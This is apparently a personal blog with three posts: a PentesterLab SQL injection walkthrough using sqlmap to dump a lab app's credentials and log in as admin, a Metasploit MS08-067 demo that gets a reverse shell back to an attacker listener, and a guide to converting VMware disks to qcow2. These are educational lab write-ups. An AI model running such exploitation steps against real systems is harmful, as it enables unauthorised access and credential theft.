Pentester Lab SQL Injection Exercise

Pentesterlab.com is one of the online course provider for Penetration testing. One of its exercise ask you to test for a SQL injection on one of the vulnerable application. Before you started, you need an ISO file of the vulnerable application. You can download the ISO image here.

Now lets try the exercise.

Notes:

• Attacker IP: 192.1668.0.103

• Target IP: 192.168.0.102, midway change to 192.168.0.105

First run sqlmap on Kali along with the banner scanner. The banner will tell the version of MySQL running on the targeted application. Use the command on the following image.

The sqlmap will do some operations needed to detect the version

Next, the version of the MySQL will be revealed along with the version of the web server. The version of the MySQL was revealed to be the 5.1.63 version which is still has the vulnerabilities of SQL injection. Once we know that it is still vulnerable, I tried to get more information regarding the database.

The following command is used to get the database available inside the target.

The available databases will be retrieved. Now we know that there are two available databases, information_schema and photoblog. Since the name of the web application is photoblog, I’m pretty sure that the database that contains the information of the web application is the photoblog db. The next step is to get the available tables inside the photoblog database.

The following command is used to get the tables of the photoblog database. –tables is used to get the list of the tables. Notes that this time the IP is changed, but it will not affect the result of the command.

The available tables will be shown once the command execution is finished. Now we see that there are three available tables on the photoblog database. There are categories, pictures, and users. Based on the common knowledge, the categories will contain the photo categories, while pictures will be the list of the photo/images on the photoblog sites. The last tables which is users must be contains the information of registered users along with the admin. The next step is to look on the available columns on the users table.

Use to following command to get the columns of the users table.

This resulted in the columns id, login, and password. The next step is to dump all the contents of the users table.

The –dump command will generate the table of the users table.

This is the users table, along with the content of it Now we know that the username for the login is called admin and the password is P4ssw0rd. The next step is to test the login using admin as the login username and P4ssw0rd

Now go to the login screen of the web application.

There you go. Now you has an access as the admin who can upload the image.

Now you know how dangerous if you exposing the parameter on the URL. Therefore in designing web application, you need to carefully measure what the user need to see. Moreover, avoid constructing SQL queries with user input. Using a framework when creating a php based web application is also important since this framework usually provide the means to query that is free from SQL injection vulnerability. Codeigniter for example, use Active Record for accessing the query.

References:

• http://www.esecurityplanet.com/hackers/how-to-prevent-sql-injection-attacks.html

• https://pentesterlab.com/exercises/from_sqli_to_shell

MS08_067 Vulnerability Demo with Metasploit

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved. For this example, I will try to make reverse shell connection. The schema is represented by the image below:

To make this kind of schema, I will use the ms08_067_netapi vulnerability. Ms08 means Microsoft 2008, the year of the patch that make this vulnerability. 067 means the patch number of that year (67th). The vulnerability is explain here.

First, I set the exploit by using the command use windows/smb/ms08_067_netapi. Next I had to set the target host on RHOST. Just type set RHOST 131.107.1.222 to set the target IP address.

Next, run show options to see the this that has been setup.The RHOST now point to 131.107.1.222 and the RPORT pointed to an open port of the target.

The next step is to set the payload. Payload is the set  of codes that is used to execute the exploit. This time to make a reverse shell, the payload that need to be set is the windows/shell/reverse_tcp. In reverse shell, we need to set the listening host (LHOST) because the target needs to listen to this host. Set LHOST with the set LHOST 131.107.1.101. To see the LHOST again execute show options.

This time, options command show the info of the LHOST. The LHOST will listen on port 4444. The last command is to run the exploit by typing exploit.

 

There you go, I have an access to the shell target.

Reference:

• https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi

• http://resources.infosecinstitute.com/icmp-reverse-shell/

Convert .vmdk to .qcow2/qemu

VMware and VirtualBox use .vmdk file as their virtualization. VMDK (Virtual Machine Disk) is a file format that acts as containers for virtual hard disk drives to be used in virtual machines monitor. While .vmdk file can be used on any virtual machine monitor, some virtual machine monitor cannot run .vmdk file and only accept the other type of virtualization file which is called Kernel-based Virtual Machine (KVM). KVM is a virtualization for the Linux kernel that turns it into a hypervisor. Some of the virtual machine monitor that runs KVM are Proxmox, Kimchi, OpenQRM

The trouble began when we has a running VM with .vmdk format, but we want to use on the machine that accepts the KVM. To do this, we need to convert the .vmdk file into another type. Usually KVM runs with .qcow2 or .qemu format. After some researchs, I found out that you need a copy of the .vmdk file first. To do this, VMware workstation already has a tool called vmware-vdiskmanager that is accessible on the VMware workstation folder.

Confirms it by see it on the folder.

Now, download a qemu file converter that is called qemu-img. Can be downloaded from here for Windows. Extract it and put the .exe file on the same folder with the target .vmdk files. Now, I convert the .vmdk file into .qcow2

Once the file has been successfuly converted, check it using the check and info command.

 

The converted file will be available on the VMware workstation folder

That’s it, this is one of the way to convert a .vmdk file.

References:

• https://cloudbase.it/qemu-img-windows/

• https://www.vmware.com/support/ws45/doc/disks_vdiskmanager_eg_ws.html